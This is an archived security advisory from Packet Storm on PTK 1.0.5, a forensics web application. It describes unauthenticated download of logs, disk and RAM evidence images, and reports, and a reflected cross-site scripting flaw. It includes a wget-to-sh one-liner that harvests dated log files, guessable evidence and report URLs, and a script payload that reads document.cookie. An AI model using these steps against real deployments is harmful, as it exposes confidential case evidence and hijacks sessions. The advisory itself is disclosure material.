what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PTK 1.0.5 Cross Site Scripting / Unrestricted Access

PTK 1.0.5 Cross Site Scripting / Unrestricted Access
Posted Mar 30, 2012
Authored by anonymous

PTK version 1.0.5 suffers from cross site scripting and direct access bypass vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
SHA-256 | 73db2993ed1cf68f7e922d7bd762d40bda60592e0f603e13367647097dc3daa2

PTK 1.0.5 Cross Site Scripting / Unrestricted Access

Change Mirror Download
# Exploit Title: Multiple PTK DFlabs failures to restrict access to sensitive data
# Author: Anonymous
# Software Link: http://sourceforge.net/projects/ptk-forensics/files/ptk-1.x/ptk-1.0.5/ptk-1.0.5.tar.gz/download
# Version: 1.0.5
# Tested on: Ubuntu

--[A]-- Introduction

PTK DFlabs forensics is an alternative framework for the TSK suite (The
SleuthKit). The following vulnerabilities where discovered in the PTK
DFlabs (ptk-1.0.5.tar.gz) free version. Professional PTK DFlabs versions
might also be affected (Not tested).

--[B]-- Advisory

Sensitive log files, evidences (disk ".dd" images /ram images etc..) and
reports can be retrieved without being authenticated to the PTK DFlabs web
application.

1) Unrestricted Logs Access

Unauthenticated users can download PTK DFlabs logs by guessing their names
since no kind of authorization/authentication check is performed by PTK
DFlabs.
The PTK DFlabs web application saves data in the /log folder. An example of
the path and of the log names is the following:

http://localhost/ptk/log/audit.log
http://localhost/ptk/log/20120304.log

The "audit" log contains information about PTK registered users (e.g.
Investigators). The username disclosure can be used by attackers to perform
more easily a password brute force attack.

PTK DFlabs generates also a log about every day activities using the
following standard: year + month + day + ".log"
This "daily log" contains information about "cases" (a sort of project) and
about the name of the evidences (disk/ram images etc..).

An attacker can use the following script to generate valid log file names
and then download them:

echo
http://localhost/ptk/log/2012{01,02,03,04,05,06,07,08,09,10,11,12}{01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31}.log|
tr " " "\n" | awk '{print "wget " $1}' | sh

This is an extract from the audit.log file generated by the PTK DFlabs that
discloses the usernames since it can be retrieved without being
authenticated:

04/03/2012 , 10:23:57 , admin , Http request may be crafted , Unauthorized
access to new_investigator
04/03/2012 , 10:03:06 , peter , Http request may be crafted , Login error

This is an extract from the "daily log" (e.g. 20120304.log) generated by
PTK DFlabs that discloses the name of the "case" and the name of the
evidences (disk/ram images etc..):

04/03/2012 , 14:20:23 , test , Http request may be crafted , Login error
04/03/2012 , 14:20:33 , admin , Http request may be crafted , User logged in
04/03/2012 , 14:20:53 , admin , Http request may be crafted , Investigators
modified for case caso1
04/03/2012 , 14:22:39 , admin , Http request may be crafted , New image
memoria added
04/03/2012 , 14:23:47 , admin , Http request may be crafted , Analysis
started on image memoria

2) Unrestricted Evidences Access

Since PTK DFlabs saves forensics evidences (disk .dd images, ram images
etc..) in a not secure manner thus allowing a direct and not authenticated
access, an attacker can use information contained into the "daily log"
generated by PTK DFlabs to retrieve the name of the "case" and the name of
the evidences (disk/ram images etc..) in order to download them from the
/images/ folder.

PTK DFlabs uses the following naming convection to save evidences (disk .dd
images, ram images etc..): case name + _ + image name + . + 3 numbers

As example, the lines of the "daily log" reported in this PoC
(20120304.log) they permit to an attacker to build the path to dowload
every evidences (disk/ram images etc..).
In this example the "case" name is "caso1" and the name of the evidence
(disk/ram images etc..) is "memoria". The attacker has only to interlock
the case and the image name and he has to fuzz the "extension" (3 number
long) in order to download, without being authenticated, every evidences
(disk/ram images etc..).

An example of a valid request is:

http://localhost/ptk/images/caso1_memoria.001

3) Unrestricted Reports Access

Since PTK DFlabs saves even reports in a not secure manner an attacker not
authenticated to the PTK DFlabs web application can retrieve every PTK
DFlabs report from the /report/ folder.
The naming convention for PTK DFlabs reports is: year + month + day + _ +
hour + . + minute + . + second + _ + case name + .pdf

An example of a valid request is:

http://localhost/ptk/report/20120304_16.08.21_caso1.pdf

Note that the attacker only needs to brute force the date and the time
values since the name of the "case" (caso1) can be recovered from log files.

4) Input validation: Reflected XSS

Furthermore also user input is not properly managed and the failure is
exacerbated by the lack of the HttpOnly in the Set-Cookie directive.
An authenticated user while analyzing a disk/ram image can trigger an XSS
with the following request:

Request:

GET
/ptk/lib/modal_bookmark.php?arg1=6&arg2=null&arg3=1&arg4=No|aaa%20-%20No|Memory%20at%20offset%20No.%20Found%20using%20keyword:%20aaa8f8fe"><script>alert(document.cookie)</script>c6692100772


5) Lack of HttpOnly

A Set-Cookie done by PTK DFlabs:

Set-Cookie: PHPSESSID=5sl9ktt7e7qrvbklacurq1drf3; path=/

--[C]-- Lulz

Now, a funny offprint about the supposed security/hardening of PTK DFLabs (
http://ptk.dflabs.com/news.html):

"PTK makes an extensive User Auth Check since its beta version" - DFlabs
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close